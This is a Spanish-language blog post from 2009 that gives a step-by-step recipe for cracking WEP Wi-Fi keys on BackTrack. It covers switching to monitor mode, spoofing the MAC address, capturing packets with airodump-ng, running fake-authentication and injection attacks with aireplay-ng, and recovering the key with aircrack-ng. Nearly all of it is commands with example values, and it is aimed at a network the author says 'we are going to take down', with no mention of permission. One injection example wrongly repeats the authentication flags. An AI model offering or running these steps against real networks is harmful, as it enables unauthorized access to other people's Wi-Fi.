Descifrado WEP
1. se lee el iv
2. se pega el iv ala clave wep
3. se genera el rc4 keystream
4. se hace XOR mensaje cifrado / rc4 keystream
5. se obtiene el icv
6. se comprueba el icv
Modo Managed
Modo Monitor
EN BACKTRACK
1.ABRIR SHELL
2.Ver el modo en que esta
iwconfig
3.CAMBIAR DE MODO MANAGED A MODO MONITOR
iwconfig INTERFAZQUESEVAAMANEJAR mode monitor
EJ: iwconfig wlan0 mode monitor
"ls" = "dir" en windows
"rm" para borrar archivos
"clear"= borrar pantalla
4.CAMBIAR LA MAC
macchanger -m MACNUEVA INTERFAZAMANEJAR
EJ: macchanger -m 00:11:22:33:44:55 wlan0
5. para ver las redes
airodump-ng INTERFAZQUESEVAAMANEJAR
EJ: airodump-ng wlan0
"PWR" PODER DE LA SE�AL EN %
"BEACONS" SON LOS IV'S
"#DATA" LOS PAQUETES MAS DE 5000 PARA SABER WEP
6.CAPTURAR EN PAQUETES DEL CANAL X Y GUARDARLO EN ARCHIVO Y
airodump-ng -c CANAL -w ARCHIVO INTERFAZQUESEVAAMANEJAR
EJ: airodump-ng -c 11 -w INFINITUM0000 wlan0
PARA CAPTURAR UNA BSSID EN ESPECIFICO
airodump-ng -c CANAL --bssid MACDELACCESSPOINT -w ARCHIVO wlan0
EJ: airodump-ng -c 11 --bssid 00:AA:BB:CC:DD:FF -w INFINITUM0000 wlan0
si pide -a mac adress
7.AUTENFICACION FALSA CON EL ROUTER
aireplay-ng -e SSID -a MACDELACCESSPOINT -h MACNUESTRAPC -1 0 INTERFAZQUESEVAAMANEJAR
EJ: aireplay-ng -e INFINITUM0000 -a 00:AA:BB:CC:DD:FF -h 00:11:22:33:44:55 -1 0 wlan0
"-e" SSID
"-1" ATAQUE DE AUTENTIFICACION FALSA
"0" INFINITO
8.INYECTAR
aireplay-ng -e SSID -b MACDELACCESSPOINT -h MACNUESTRAPC -3 INTERFAZQUESEVAAMANEJAR
EJ: aireplay-ng -e INFINITUM0000 -b 00:AA:BB:CC:DD:FF -h 00:11:22:33:44:55 -3 wlan0
o
aireplay-ng -e SSID -a MACDELACCESSPOINT -h MACNUESTRAPC -3 INTERFAZQUESEVAAMANEJAR
EJ: aireplay-ng -e INFINITUM0000 -a 00:AA:BB:CC:DD:FF -h 00:11:22:33:44:55 -1 0 wlan0
"-b" MAC DEL AP
"-3" PARA INYECTAR
9.SABER LA WEP
aircrack-ng ARCHIVO
EJ: aircrack-ng INFINITUM0000
escoger la red que queremos, en caso de que aparezcan varias, y esperamos hasta que aparezca la clave wep
y listo!!!!
Nota: Es conveniente cambiar la MAC a 00:11:22:33:44:55 y que el archivo se llame de la misma forma que la red que vamos a tumbar para que sea mas facil el proceso
El Creador
jueves, 10 de septiembre de 2009
Suscribirse a:
Enviar comentarios (Atom)
No hay comentarios:
Publicar un comentario